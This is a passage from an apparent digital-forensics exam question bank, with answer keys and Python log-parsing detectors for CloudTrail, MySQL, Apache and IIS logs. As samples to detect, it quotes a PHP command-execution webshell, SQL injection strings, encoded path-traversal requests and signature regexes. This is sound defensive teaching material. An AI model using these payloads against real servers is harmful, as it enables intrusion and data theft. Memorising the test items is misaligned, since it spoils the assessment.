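     "sourceIPAddress": "203.0.113.9",
     "requestParameters": {"bucketName": "corp-hr-data", "key": "payroll.csv"}},
    {"eventTime": "2024-07-15T14:25:00Z", "eventSource": "iam.amazonaws.com",
     "eventName": "CreateUser", "readOnly": False,
     "userIdentity": {"type": "IAMUser", "userName": "alice",
                      "arn": "arn:aws:iam::123456789012:user/alice"},
     "sourceIPAddress": "198.51.100.7",
     "requestParameters": {"userName": "backup-svc"}},
    {"eventTime": "2024-07-15T14:25:05Z", "eventSource": "iam.amazonaws.com",
     "eventName": "AttachUserPolicy", "readOnly": False,
     "userIdentity": {"type": "IAMUser", "userName": "alice",
                      "arn": "arn:aws:iam::123456789012:user/alice"},
     "sourceIPAddress": "198.51.100.7",
     "requestParameters": {"userName": "backup-svc",
                           "policyArn": "arn:aws:iam::aws:policy/AdministratorAccess"}},
    {"eventTime": "2024-07-15T14:30:00Z", "eventSource": "s3.amazonaws.com",
     "eventName": "GetObject", "readOnly": True,
     "userIdentity": {"type": "IAMUser", "userName": "bob",
                      "arn": "arn:aws:iam::123456789012:user/bob"},
     "sourceIPAddress": "198.51.100.8",
     "requestParameters": {"bucketName": "public-assets", "key": "logo.png"}},
]})

# Assumption: the IAM calls that matter when hunting for persistence.
PRIVILEGE_EVENTS = {"CreateUser", "AttachUserPolicy", "PutUserPolicy",
                    "CreateAccessKey", "AddUserToGroup", "CreateLoginProfile"}


def parse_assumed_role_arn(arn):
    """'assumed-role/<role>/<session>' -> (role, session). The session name is
    chosen by the caller; an EC2 instance profile uses the instance ID."""
    resource = arn.split(":", 5)[-1]
    kind, role, session = resource.split("/", 2)
    if kind != "assumed-role":
        raise ValueError("not an assumed-role ARN: " + arn)
    return role, session


def principal(user_identity):
    """Short human label for a userIdentity block."""
    kind = user_identity.get("type")
    if kind == "AssumedRole":
        role, session = parse_assumed_role_arn(user_identity["arn"])
        return f"AssumedRole {role} (session {session})"
    return f"{kind} {user_identity.get('userName') or user_identity.get('arn')}"


def _records(records_json):
    return sorted(json.loads(records_json)["Records"], key=lambda r: r["eventTime"])


def bucket_access(records_json, bucket):
    """Every S3 event against one bucket, oldest first."""
    return [
        {"time": r["eventTime"], "eventName": r["eventName"],
         "key": r["requestParameters"].get("key"),
         "principal": principal(r["userIdentity"]),
         "sourceIPAddress": r["sourceIPAddress"]}
        for r in _records(records_json)
        if r["eventSource"] == "s3.amazonaws.com"
        and r["requestParameters"].get("bucketName") == bucket
    ]


def privilege_grants(records_json):
    """IAM calls that create identities or hand out rights, with who made them."""
    return [
        {"time": r["eventTime"], "eventName": r["eventName"],
         "principal": principal(r["userIdentity"]),
         "sourceIPAddress": r["sourceIPAddress"],
         "target": r["requestParameters"].get("userName"),
         "policy": r["requestParameters"].get("policyArn")}
        for r in _records(records_json)
        if r["eventSource"] == "iam.amazonaws.com" and r["eventName"] in PRIVILEGE_EVENTS
    ]
```

The bucket view shows the enumerate-then-fetch pattern from the instance-profile session, and the privilege view ties the new administrator to alice's identity and source address, which is where the next pivot (was alice's access key leaked?) starts.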

115
MCQ · hard

A forensic investigator examining a compromised Linux server finds a base64-encoded string in the Apache access log: 'GET /cgi-bin/test.cgi?cmd=ZWNobyAiPD9waHAgc3lzdGVtKCRfR0VUW2NtZF0pOyA/PiI+...' After decoding, the string contains a PHP webshell. Which of the following is the MOST effective method to confirm the webshell was executed on the server?

A.Perform a memory dump of the server and search for the base64 string
B.Check the server's process accounting logs (e.g., auditd, 'lastcomm') for PHP process invocation with the cmd parameter
C.Analyze the MySQL transaction logs for any database queries triggered by the webshell
D.Search for the decoded PHP code in the web server's document root
Answer: B

Process accounting or audit records show the shell and interpreter processes the CGI request spawned, which confirms execution rather than mere receipt.

Why this answer

The access log proves the request arrived; it does not prove the CGI script acted on it. Process accounting ('lastcomm') or auditd execve records show whether the CGI handler spawned a shell and ran the decoded command (here an echo that writes a PHP webshell to a file), under which user and at what time. Searching the document root for the decoded PHP (D) is a useful follow-up, but a memory dump and the MySQL logs are indirect.

116
Multi-Select · medium

A forensic analyst is investigating a web application that was defaced. The Apache access logs show the following entries: (1) GET /cgi-bin/test.cgi HTTP/1.1 with status 200, (2) POST /cgi-bin/test.cgi HTTP/1.1 with status 200, (3) GET /index.html HTTP/1.1 with status 200, (4) GET /images/ HTTP/1.1 with status 301. Which TWO log entries are most suspicious and indicate a likely attack vector?

Select 2 answers
A.POST /cgi-bin/test.cgi
B.GET /index.html
C.GET /images/
D.GET /cgi-bin/test.cgi
E.All entries are equally suspicious
Answers: A, D

POST to a CGI script can indicate command injection.

Why this answer

Entries to /cgi-bin/test.cgi with both GET and POST suggest probing and command execution via CGI. The others are normal traffic.

117
MCQ · easy

An investigator needs to recover deleted emails from a Microsoft Outlook PST file. Which forensic technique is most appropriate?

A.Use a hex editor to manually reconstruct the PST headers
B.Convert the PST to EML and open each file individually
C.Perform file carving on the PST file to recover deleted email fragments
D.Mount the PST file and use Outlook's 'Recover Deleted Items' feature
Answer: C

Carving can recover deleted data from the PST binary structure.

Why this answer

Deleted items in PST files are often recoverable until overwritten; carving can recover remnants.

118
Multi-Select · medium

A forensic analyst is examining MySQL binary logs to identify a data exfiltration event. Which TWO fields are most critical for reconstructing the stolen data?

Select 2 answers
A.Error code
B.Timestamp
C.Server ID
D.SQL statement
E.Thread ID
Answers: B, D

The timestamp places each statement on the timeline.

Why this answer

The SQL statement shows what was done to which table, and the timestamp establishes when, so together they let the analyst reconstruct the sequence. Two caveats: with row-based logging the binlog stores row images rather than the original statement (mysqlbinlog --verbose reconstructs pseudo-SQL), and SELECTs are not logged at all, so the binlog shows data that was modified, not data that was merely read.
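Questions 81, 92, 99 and 118 keep returning to the same point: the binlog records changes, while reads by a compromised account are only visible in the general query log. The Python below is an added example, not from the page or from MySQL, that parses a constructed general_log excerpt, maps connection IDs back to accounts through their Connect lines, and flags SELECTs against a sensitive table that look like bulk extraction. The table name, the bulk threshold and the log lines themselves are assumptions:

```python
"""Pull bulk reads of a sensitive table out of the MySQL general query log.

The general log records every statement a session sends (including SELECT),
which the binary log never does: the binlog only holds changes. Connection
IDs are mapped back to accounts through the Connect lines.
"""
import re

# Constructed excerpt in the general_log file format (Time / Id / Command /
# Argument, tab-separated); accounts and addresses are invented.
SAMPLE = """\
/usr/sbin/mysqld, Version: 8.0.36 (MySQL Community Server - GPL). started with:
Tcp port: 3306  Unix socket: /var/run/mysqld/mysqld.sock
Time                 Id Command    Argument
2024-07-15T14:20:01.123456Z\t   12 Connect\twebapp@10.0.0.20 on shopdb using TCP/IP
2024-07-15T14:20:01.200000Z\t   12 Query\tSELECT id, name FROM customers WHERE id = 4411
2024-07-15T14:21:10.000000Z\t   12 Query\tSELECT * FROM customers
2024-07-15T14:21:40.000000Z\t   12 Query\tSELECT email, ssn FROM customers LIMIT 100000 OFFSET 0
2024-07-15T14:22:00.000000Z\t   13 Connect\treport@10.0.0.21 on shopdb using TCP/IP
2024-07-15T14:22:05.000000Z\t   13 Query\tSELECT COUNT(*) FROM orders
2024-07-15T14:23:00.000000Z\t   12 Query\tSELECT * FROM customers INTO OUTFILE '/tmp/c.csv'
2024-07-15T14:24:00.000000Z\t   12 Quit\t
"""

LINE = re.compile(r"^(?P<time>\S+)\s+(?P<id>\d+)\s+(?P<cmd>\w+)[ \t]?(?P<arg>.*)$")
SENSITIVE_TABLES = {"customers"}      # assumption: tables holding regulated data
BULK_LIMIT = 1000                     # assumption: LIMIT at or above this is "bulk"


def parse_general_log(text):
    """One dict per Query line, with the account resolved from its Connect line."""
    account_by_id, events = {}, []
    for line in text.splitlines():
        m = LINE.match(line)
        if not m:
            continue                      # banner and column-header lines
        time, cid, cmd, arg = m.group("time", "id", "cmd", "arg")
        if cmd == "Connect":
            account_by_id[cid] = arg.split(" on ", 1)[0]
        elif cmd == "Query":
            events.append({"time": time, "id": cid,
                           "account": account_by_id.get(cid, "?"), "sql": arg})
    return events


def read_risk(sql):
    """Tags saying why a SELECT on a sensitive table looks like bulk extraction."""
    s = " ".join(sql.lower().split())
    if not s.startswith("select"):
        return []
    tables = set(re.findall(r"\bfrom\s+`?(\w+)`?", s))
    if not tables & SENSITIVE_TABLES:
        return []
    tags = []
    if " where " not in s:
        tags.append("no-where")
    m = re.search(r"\blimit\s+(\d+)", s)
    if m and int(m.group(1)) >= BULK_LIMIT:
        tags.append("large-limit")
    if "into outfile" in s or "into dumpfile" in s:
        tags.append("into-outfile")
    return tags


def suspicious_reads(text):
    """Query events carrying at least one risk tag, in log order."""
    out = []
    for ev in parse_general_log(text):
        tags = read_risk(ev["sql"])
        if tags:
            out.append({**ev, "tags": tags})
    return out
```

The three flagged statements all come from the webapp account and none of them would appear in the binlog; the INTO OUTFILE hit is also a file write on the database host worth chasing on disk.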

119
MCQ · easy

A security analyst reviews an Apache access log entry: 192.168.1.5 - - [10/Jan/2024:08:12:35 +0000] "GET /index.php?id=1 UNION SELECT username,password FROM users-- HTTP/1.1" 200 4321 "-" "Mozilla/5.0". What type of attack is MOST likely indicated?

A.Cross-site scripting (XSS)
B.Path traversal
C.Remote file inclusion
D.SQL injection
Answer: D

The UNION SELECT clause indicates an attempt to extract data from the database.

Why this answer

The log entry shows a UNION SELECT statement appended to the id parameter, which is a classic SQL injection attempt.
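Questions 84, 89, 105, 113 and 119 each show one Apache access-log line and ask what the request target reveals. The Python below is an added example (not from the page) that generalises those five: it parses combined-format lines, percent-decodes the target until it stops changing so that double-encoded traversal is caught, and tags the decoded target with SQL-injection, traversal and XSS signatures. The log lines are constructed to mirror the ones quoted above, with the payloads written percent-encoded as a client would have to send them; the signature list is an assumption, not a complete ruleset:

```python
"""Parse Apache combined-format access log lines, percent-decode the request
target (repeatedly, to defeat double encoding) and tag the decoded target
with injection and traversal signatures.
"""
import re
from urllib.parse import unquote

# Constructed lines mirroring the entries quoted in these questions.
SAMPLE_LOG = """\
10.0.0.5 - - [20/Jan/2023:08:12:44 +0000] "GET /../../../../etc/passwd HTTP/1.1" 404 345 "-" "curl/7.68.0"
192.168.1.10 - - [10/Oct/2023:13:55:36 +0000] "GET /index.php?id=1%27%20OR%20%271%27%3D%271 HTTP/1.1" 200 1234 "-" "Mozilla/5.0"
192.168.1.5 - - [10/Jan/2024:08:12:35 +0000] "GET /index.php?id=1%20UNION%20SELECT%20username,password%20FROM%20users-- HTTP/1.1" 200 4321 "-" "Mozilla/5.0"
10.0.0.5 - - [20/Jan/2023:08:13:01 +0000] "GET /static/%252e%252e%252f%252e%252e%252fetc/shadow HTTP/1.1" 403 199 "-" "curl/7.68.0"
203.0.113.4 - - [20/Jan/2023:08:14:20 +0000] "GET /index.php?id=42 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
"""

COMBINED = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) (?P<proto>HTTP/[\d.]+)" '
    r'(?P<status>\d{3}) (?P<size>\d+|-) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)

# Assumption: a small illustrative signature set, applied to the decoded target.
SIGNATURES = {
    "sql-injection": re.compile(
        r"('\s*or\s*'|\bunion\b\s+(?:all\s+)?select\b|\bor\s+1\s*=\s*1\b|;\s*drop\b)", re.I),
    "path-traversal": re.compile(r"(?:\.\./|\.\.\\)"),
    "xss": re.compile(r"<\s*script\b", re.I),
}


def decode_target(target, rounds=3):
    """Percent-decode until the string stops changing (bounded to `rounds`)."""
    for _ in range(rounds):
        decoded = unquote(target)
        if decoded == target:
            break
        target = decoded
    return target


def parse_line(line):
    """Dict of fields plus the decoded target and its signature tags, or None."""
    m = COMBINED.match(line)
    if not m:
        return None
    row = m.groupdict()
    row["decoded"] = decode_target(row["target"])
    row["tags"] = [name for name, rx in SIGNATURES.items() if rx.search(row["decoded"])]
    return row


def analyze(text):
    """Parsed rows for every well-formed line."""
    return [row for row in (parse_line(l) for l in text.splitlines()) if row]


def by_client(text):
    """Count tagged requests per client IP, a quick pivot for follow-up."""
    counts = {}
    for row in analyze(text):
        if row["tags"]:
            counts[row["ip"]] = counts.get(row["ip"], 0) + 1
    return counts
```

The fourth line is double-encoded (%252e is %2e which is '.'); one unquote pass leaves '%2e%2e%2f' in place, so a detector that decodes only once misses it. Status codes are kept alongside the tags because a 404 or 403 records an attempt while a 200 may record a success.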

120
MCQ · hard

While investigating a compromised web server, you discover a file named 'shell.php' in the web root. The file contains the following code: <?php system($_GET['cmd']); ?>. Which of the following best describes this file?

A.A SQL injection script
B.A file upload vulnerability exploit
C.A backdoor trojan
D.A web shell
Answer: D

Webshells provide a command-line interface via HTTP.

Why this answer

This PHP code executes system commands passed via the 'cmd' GET parameter. This is a classic webshell, allowing remote command execution.

121
MCQ · easy

Which of the following is a primary challenge in cloud forensics due to the shared responsibility model?

A.Inability to perform live acquisition of volatile data without cooperation from the cloud provider
B.Data is always stored in a single jurisdiction
C.Lack of encryption support
D.Cloud logs are immutable and cannot be altered
Answer: A

In cloud environments, forensic investigators often lack physical or administrative access to capture volatile data (e.g., memory) without provider assistance.

Why this answer

The shared responsibility model means the cloud provider controls the infrastructure, limiting the investigator's ability to acquire volatile data without provider support.

122
Multi-Select · hard

During a forensic analysis of a compromised web server, an investigator identifies the following log entries. Which THREE entries are the strongest indicators of a successful web shell upload? (Choose three.)

Select 3 answers
A.POST /upload.php HTTP/1.1 200 0
B.POST /uploads/shell.aspx HTTP/1.1 200 - -
C.GET /uploads/shell.aspx?cmd=dir HTTP/1.1 200 - -
D.GET /../../windows/system32/cmd.exe HTTP/1.1 404 - -
E.GET /images/logo.png HTTP/1.1 304 - -
Answers: A, B, C

A successful POST to upload.php could be a PHP-based web shell upload.

Why this answer

Successful uploads of aspx or php files that contain web shell code (e.g., with cmd parameter) and subsequent access to those files are strong indicators. The 404 for cmd.exe indicates a path traversal attempt, not a web shell.
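Questions 83, 86, 97, 102, 106 and 122 all read IIS log lines by eye. The Python below is an added example, not taken from the page or from Microsoft, that does it by name: it parses a W3C extended log using its #Fields directive (so sc-status is found wherever the server put it), tags each row with the traversal and webshell indicators these questions use, and chains a successful POST to an upload handler to the later hits from the same client on a script in an upload directory, which is the pattern question 122 asks for. The log excerpt is constructed, and the upload-directory list and parameter names are assumptions:

```python
"""Parse IIS W3C extended logs by their #Fields directive (so sc-status is found
by name, not by position), tag rows, and chain an upload to the later hits on
the script it produced.
"""
import re

# Constructed excerpt; W3C fields are space-separated and '-' marks an
# empty value. Addresses and paths are invented.
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 10.0
#Version: 1.0
#Date: 2024-07-15 14:00:00
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status sc-substatus sc-win32-status sc-bytes time-taken
2024-07-15 14:20:01 10.0.0.10 GET /index.html - 80 - 198.51.100.7 Mozilla/5.0 200 0 0 2311 5
2024-07-15 14:21:10 10.0.0.10 POST /upload.aspx - 80 - 203.0.113.9 Mozilla/5.0 200 0 0 188 40
2024-07-15 14:21:30 10.0.0.10 GET /uploads/cmd.aspx cmd=whoami 80 - 203.0.113.9 curl/8.0 200 0 0 61 120
2024-07-15 14:21:55 10.0.0.10 POST /uploads/cmd.aspx - 80 - 203.0.113.9 curl/8.0 200 0 0 4096 300
2024-07-15 14:22:10 10.0.0.10 GET /../../windows/system32/cmd.exe - 80 - 203.0.113.9 Mozilla/5.0 404 0 2 1412 3
2024-07-15 14:23:00 10.0.0.10 GET /images/logo.png - 80 - 198.51.100.7 Mozilla/5.0 304 0 0 0 1
"""

SCRIPT_EXT = (".aspx", ".asp", ".ashx", ".php", ".jsp", ".cgi")
UPLOAD_DIRS = ("/uploads/", "/upload/", "/files/", "/images/", "/tmp/")   # assumption: writable dirs
CMD_PARAM = re.compile(r"(?:^|&)(?:cmd|exec|command|c)=", re.I)
TRAVERSAL = re.compile(r"\.\.(?:/|\\|%2f|%5c)", re.I)


def parse_w3c(text):
    """Rows as dicts keyed by the names in the most recent #Fields line."""
    fields, rows = None, []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            values = line.split(" ")
            if len(values) == len(fields):
                rows.append(dict(zip(fields, values)))
    return rows


def classify(row):
    """Indicator tags for a single row."""
    stem, query, status = row["cs-uri-stem"].lower(), row["cs-uri-query"], row["sc-status"]
    tags = []
    if TRAVERSAL.search(stem) or TRAVERSAL.search(query):
        tags.append("path-traversal")
    if stem.startswith(UPLOAD_DIRS) and stem.endswith(SCRIPT_EXT) and status.startswith("2"):
        tags.append("script-in-upload-dir")
    if query != "-" and CMD_PARAM.search(query):
        tags.append("command-parameter")
    if row["cs-method"] == "POST" and stem.endswith(SCRIPT_EXT) and status.startswith("2"):
        tags.append("post-to-script")
    return tags


def webshell_chains(rows):
    """Successful POST to an upload handler followed, from the same client,
    by requests to a script inside an upload directory."""
    chains = []
    for i, row in enumerate(rows):
        stem = row["cs-uri-stem"].lower()
        is_handler = (row["cs-method"] == "POST" and row["sc-status"] == "200"
                      and "upload" in stem and not stem.startswith(UPLOAD_DIRS))
        if not is_handler:
            continue
        later = [r for r in rows[i + 1:]
                 if r["c-ip"] == row["c-ip"] and "script-in-upload-dir" in classify(r)]
        if later:
            chains.append({"client": row["c-ip"], "handler": row["cs-uri-stem"],
                           "uploaded_script_hits": [(r["cs-method"], r["cs-uri-stem"], r["cs-uri-query"])
                                                    for r in later]})
    return chains
```

The traversal line is tagged but returns 404, so it records an attempt; the chain from /upload.aspx to /uploads/cmd.aspx?cmd=whoami from the same client is the evidence of a working shell. Matching ..%5c as well as ../ covers the encoded-backslash form from question 102.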

123
Multi-Selecthard

Which THREE of the following are challenges specific to container forensics? (Select THREE.)

Select 3 answers
A.Containers share the same kernel as the host, limiting isolation for forensic acquisition
B.Network isolation prevents packet capture
C.Ephemeral nature of containers leads to volatile evidence
D.Standard forensic imaging tools can be directly applied
E.Need to analyze layered image filesystem instead of a single disk image
AnswersA, C, E

Because the container has no kernel or disk of its own, acquisition (host memory capture, copying the overlay2 layers) is done on the host and touches every container running there.

Why this answer

Containers are ephemeral (evidence disappears when they are removed), they share the host kernel (there is no per-container kernel or disk to isolate), and their filesystems are stacks of image layers plus a writable layer that must be analysed together. Standard disk imaging produces a host image rather than a per-container one, and network isolation is not a specific challenge because traffic can be captured from the host side of the container's network namespace.

124
Multi-Selectmedium

A forensic analyst is examining a Google Cloud Platform (GCP) environment after a security incident. Which TWO GCP services should the analyst use to audit API activity and resource changes? (Select TWO.)

Select 2 answers
A.Cloud Asset Inventory
B.Cloud Audit Logs
C.Cloud Storage Object Change Notification
D.Cloud Monitoring
E.Cloud Functions
AnswersA, B

Cloud Asset Inventory provides a history of resource configurations and changes.

Why this answer

Cloud Audit Logs record API calls and resource changes, while Cloud Asset Inventory tracks resource history and configuration changes.

125
Multi-Selecthard

A cloud forensic investigator is analyzing a GCP audit log entry for a Compute Engine instance. Which THREE fields are essential for identifying the user and operation performed?

Select 3 answers
A.requestMetadata.callerIp
B.methodName
C.resourceName
D.requestMetadata.userAgent
E.authenticationInfo.principalEmail
AnswersB, C, E

Indicates the operation (e.g., v1.compute.instances.delete).

Why this answer

GCP audit log entries carry the identity in protoPayload.authenticationInfo.principalEmail, the operation in protoPayload.methodName and the target in protoPayload.resourceName. requestMetadata.callerIp and the user agent (the actual field is requestMetadata.callerSuppliedUserAgent) describe the client and help with attribution, but they do not identify the principal or the operation and are not present in every entry.

126
Multi-Selectmedium

Which TWO of the following are common challenges specific to cloud forensics? (Select TWO)

Select 2 answers
A.Volatile memory acquisition
B.Inability to image hard drives
C.Data jurisdiction and legal compliance
D.Multi-tenancy and separation of data
E.Lack of proper tools
AnswersC, D

Data may reside in different countries with varying laws, posing jurisdictional issues.

Why this answer

Multi-tenancy (shared infrastructure) and data jurisdiction (where data is physically stored) are unique to cloud forensics, unlike physical or virtual environments.

127
MCQeasy

Which of the following tools is specifically designed to analyze email headers and track the path of an email, providing information about delays and potential spoofing?

A.EmailTracker
B.Wireshark
C.FTK Imager
D.Autopsy
AnswerA

EmailTracker is designed for email header analysis and tracking.

Why this answer

EmailTracker is a tool that analyzes email headers, visualizes the path, and helps identify spoofing and delivery delays.

128
MCQmedium

During a database forensic investigation, you need to review Microsoft SQL Server transaction logs to identify unauthorized data modifications. Which of the following SQL Server functions or commands is used to read the transaction log?

A.SELECT * FROM sys.dm_tran_database_transactions
B.DBCC LOG
C.fn_dblog
D.BACKUP LOG
AnswerC

fn_dblog reads the transaction log and provides detailed information.

Why this answer

fn_dblog is an undocumented table-valued function that reads the transaction log and returns one row per log record; fn_dblog(NULL, NULL) returns the whole active log, and the Operation (for example LOP_INSERT_ROWS, LOP_DELETE_ROWS, LOP_MODIFY_ROW), [Transaction ID], [Begin Time] and AllocUnitName columns let an investigator tie a change to a table, a transaction and a time. Run it against a restored copy so the evidence database is not touched. DBCC LOG is an older undocumented command with similar output, BACKUP LOG only writes the log to a backup file, and sys.dm_tran_database_transactions shows only transactions that are active right now.

129
Multi-Selecthard

An incident response team is investigating a breach involving a Docker container. Which THREE of the following actions should the team take to preserve forensic evidence?

Select 3 answers
A.Stop the container immediately to prevent further compromise
B.Use docker export to save the container's filesystem as a tar archive
C.Run docker commit to create an image from the container
D.Use docker inspect to examine container metadata before stopping
E.Execute docker logs to capture container logs
AnswersB, C, E

Exports the container's filesystem for offline analysis.

Why this answer

Creating a container image preserves the filesystem and configuration. Saving logs via docker logs captures runtime output. Exporting the container as a tar archive preserves the filesystem.

Stopping the container first discards volatile state (running processes, memory, open connections), so it is a containment step rather than a preservation step; docker inspect is read-only and worth recording, but it captures metadata rather than preserving the filesystem or logs that the three chosen actions secure.

130
MCQeasy

Which of the following tools is specifically designed for parsing and analyzing email headers to detect spoofing and trace the origin of an email?

A.EmailTracker
B.Wireshark
C.Volatility
D.Sleuth Kit
AnswerA

EmailTracker is designed for email header analysis and tracing.

Why this answer

EmailTracker is a tool that analyzes email headers to track the path of an email and detect spoofing.

131
MCQmedium

A forensic analyst is reviewing Microsoft IIS logs and finds the entry: 192.168.1.50, -, 10/Feb/2025:14:22:10 +0000, GET /scripts/..%c1%af../winnt/system32/cmd.exe, 404. Which attack technique is indicated by the encoded characters in the URI?

A.Directory listing attempt
B.SQL injection (SQLi)
C.Cross-site scripting (XSS)
D.Path traversal attack using Unicode encoding
AnswerD

The ..%c1%af.. pattern is a '..' traversal whose directory separator is hidden inside a malformed two-byte UTF-8 sequence.

Why this answer

Non-shortest-form (overlong) UTF-8 such as %c0%af for '/' and %c1%9c for '\' is invalid UTF-8 that compliant decoders reject, but IIS 4.0 and 5.0 decoded such sequences only after checking the path for '..', so a request like /scripts/..%c1%af../winnt/system32/cmd.exe escaped the scripts directory and ran cmd.exe on unpatched servers (the IIS Unicode directory traversal bug, MS00-078). The 404 in this entry shows the server did not resolve the path, so this attempt failed, but the source IP should be checked for further probes with other encodings.

132
MCQmedium

In cloud forensics, which AWS service logs API calls for governance, compliance, and operational auditing, and is the primary source for detecting unauthorized access?

A.AWS CloudTrail
B.AWS Config
C.Amazon CloudWatch
D.AWS GuardDuty
AnswerA

CloudTrail records management-plane API calls by default; S3 object-level data events must be enabled separately.

Why this answer

AWS CloudTrail records API activity in the account with the caller identity, source IP address, user agent and request parameters, which is the evidence an unauthorized-access investigation needs. GuardDuty raises findings derived from CloudTrail, VPC Flow Logs and DNS logs but is not the log itself, AWS Config tracks resource configuration state, and CloudWatch collects metrics and application logs.

133
MCQeasy

Which cloud service log is most appropriate for tracking API calls and resource changes in an AWS environment?

A.AWS VPC Flow Logs
B.AWS Config
C.AWS CloudTrail
D.AWS CloudWatch Logs
AnswerC

CloudTrail records the API calls (management events by default) that create, change or delete resources, together with the caller identity.

Why this answer

AWS CloudTrail is the service that records API activity and resource changes.

134
MCQmedium

During an investigation of a suspected data exfiltration, a forensic analyst examines MySQL general query logs and finds a large number of SELECT queries retrieving customer records, followed by DELETE queries. Which of the following is the most likely conclusion?

A.An attacker exfiltrating data and then deleting the records to cover tracks
B.An attempted SQL injection attack
C.A misconfigured replication process
D.Normal database maintenance operations
AnswerA

SELECT then DELETE indicates data theft and cleanup.

Why this answer

Bulk SELECTs over customer records followed by DELETEs of the same rows is the classic pattern of exfiltration followed by clean-up. Note that the general query log is off by default and must have been enabled before the incident; where it is missing, the binary log still records the DELETE statements or row events, though not the SELECTs.

135
MCQmedium

A security analyst reviews the following Apache access log entry: 192.168.1.10 - - [15/May/2025:10:15:23 +0000] "GET /search.php?q=1'%20OR%20'1'='1 HTTP/1.1" 200 5321 "-" "Mozilla/5.0". Which type of attack is most likely indicated?

A.Cross-site scripting (XSS)
B.Path traversal
C.Remote file inclusion
D.SQL injection (SQLi)
AnswerD

The payload ' OR '1'='1 is a classic SQL injection attempt to bypass authentication or extract data.

Why this answer

The log shows a GET request whose 'q' parameter carries a SQL injection payload (1' OR '1'='1). The HTTP 200 with a 5321-byte body shows the application processed the request, not that the injection succeeded; compare the response size with ordinary requests to search.php and check application or database error logs to establish impact.
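The decoding problem behind this question and question 131 above (overlong UTF-8 and double-encoded traversal) in one added example that is not from the page: it percent-decodes a request target, decodes UTF-8 strictly and, when that fails, the lax way a decoder without the shortest-form check would, then labels traversal and SQL injection patterns. The sample targets are modelled on the log entries in the questions; the regexes are a starting signature set, not a complete one.

```python
import re
from urllib.parse import unquote_to_bytes

SQLI_RE = re.compile(
    r"(?i)'\s*(?:or|and)\s*'?\d"           # ' OR '1'='1, ' or 1=1
    r"|\bunion\s+(?:all\s+)?select\b"      # UNION SELECT data extraction
    r"|--\s|/\*"                            # comment sequences used to truncate the query
    r"|;\s*(?:drop|delete|update|insert)\b"
)
TRAVERSAL_RE = re.compile(r"(?:^|[\\/])\.\.(?:[\\/]|$)")
ENCODED_RE = re.compile(r"%[0-9a-fA-F]{2}")


def decode_utf8_lenient(raw):
    """Strict UTF-8 decode; if that fails, decode the way a lax decoder would and record why.

    Two-byte sequences led by C0/C1 are overlong: they spell an ASCII code point in two bytes,
    which RFC 3629 forbids but the vulnerable IIS decoder accepted (%c0%af -> '/', %c1%9c -> '\\').
    """
    try:
        return raw.decode("utf-8"), []
    except UnicodeDecodeError:
        pass
    out, bad, i = [], [], 0
    while i < len(raw):
        b = raw[i]
        if b < 0x80:
            out.append(chr(b))
            i += 1
        elif 0xC0 <= b <= 0xDF and i + 1 < len(raw) and 0x80 <= raw[i + 1] <= 0xBF:
            out.append(chr(((b & 0x1F) << 6) | (raw[i + 1] & 0x3F)))   # no shortest-form check
            if b in (0xC0, 0xC1):
                bad.append(("overlong", raw[i:i + 2].hex()))
            i += 2
        else:
            n = 3 if 0xE0 <= b <= 0xEF else 4 if 0xF0 <= b <= 0xF4 else 1
            try:
                out.append(raw[i:i + n].decode("utf-8"))
            except UnicodeDecodeError:
                out.append("\ufffd")
                bad.append(("invalid", f"{b:02x}"))
                n = 1
            i += n
    return "".join(out), bad


def classify_target(target, max_rounds=2):
    """Return (decoded target, labels, malformed sequences) for a raw request target from a log."""
    labels, bad_all, text = set(), [], target
    for _ in range(max_rounds):
        text, bad = decode_utf8_lenient(unquote_to_bytes(text))
        bad_all += bad
        if not ENCODED_RE.search(text):
            break
        labels.add("double-encoding")          # a %25xx survived one round of decoding
    if bad_all:
        labels.add("malformed-utf8")
    path, _, query = text.partition("?")
    # A '..' segment after decoding, or '..' glued to a malformed sequence that a lax
    # decoder would have turned into a separator, both count as traversal.
    if TRAVERSAL_RE.search(path) or (bad_all and ".." in path):
        labels.add("path-traversal")
    if SQLI_RE.search(query) or SQLI_RE.search(path):
        labels.add("sqli")
    return text, labels, bad_all


if __name__ == "__main__":
    # Constructed request targets modelled on the log entries in the questions.
    for t in ("/scripts/..%c1%af../winnt/system32/cmd.exe",
              "/scripts/..%c0%af../winnt/system32/cmd.exe",
              "/scripts/..%255c../winnt/system32/cmd.exe",
              "/search.php?q=1'%20OR%20'1'='1",
              "/images/logo.png"):
        decoded, labels, bad = classify_target(t)
        print(f"{t:48} -> {decoded!r} {sorted(labels)} {bad}")
```

Feed it the request-target field from each log line; the returned malformed-sequence list tells you which encoding trick was used, which is worth recording in the report alongside the decoded path.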

136
MCQhard

During a Docker forensics investigation, an analyst needs to identify the commands executed within a deleted container. Which of the following approaches is MOST effective to retrieve this information?

A.Check the Docker daemon logs for container start/stop events
B.Search the host filesystem for the container's log files in /var/lib/docker/containers
C.Use `docker inspect` on the container ID
D.Examine the container's image layers using `docker history`
AnswerB

With the default json-file log driver, each container's stdout/stderr is written to /var/lib/docker/containers/<container_id>/<container_id>-json.log. For containers run with a TTY, the echoed input (including typed commands) appears in that output.

Why this answer

docker inspect fails once the container is removed, and docker history shows image build steps, not runtime commands, so the host-side log file is the best remaining source. Note that docker rm deletes the container's directory, so after removal the log survives only if it was shipped to a central log sink, exists in a backup or filesystem snapshot, or can be carved from a disk image of the host.

137
Multi-Selectmedium

Which TWO of the following are valid indicators of email spoofing when analyzing email headers?

Select 2 answers
A.The 'From' header domain matches the 'Return-Path' domain
B.The 'DKIM-Signature' header validates successfully
C.The 'Received-SPF' header shows 'fail'
D.The 'Message-ID' header contains the sender's IP address
E.The 'Reply-To' header differs from the 'From' header
AnswersC, E

SPF fail indicates the sending server is not authorized to send for the domain.

Why this answer

An SPF 'fail' means the connecting server is not authorized to send for the envelope sender's domain; a Reply-To domain that differs from the From domain redirects replies to an address the sender controls. The Reply-To mismatch alone is common in legitimate mail (ticketing systems, mailing lists), so weigh it together with the SPF, DKIM and DMARC results. Matching From and Return-Path domains and a valid DKIM signature are signs of legitimacy, and the Message-ID is set by the sending software and carries no authentication value.

138
MCQhard

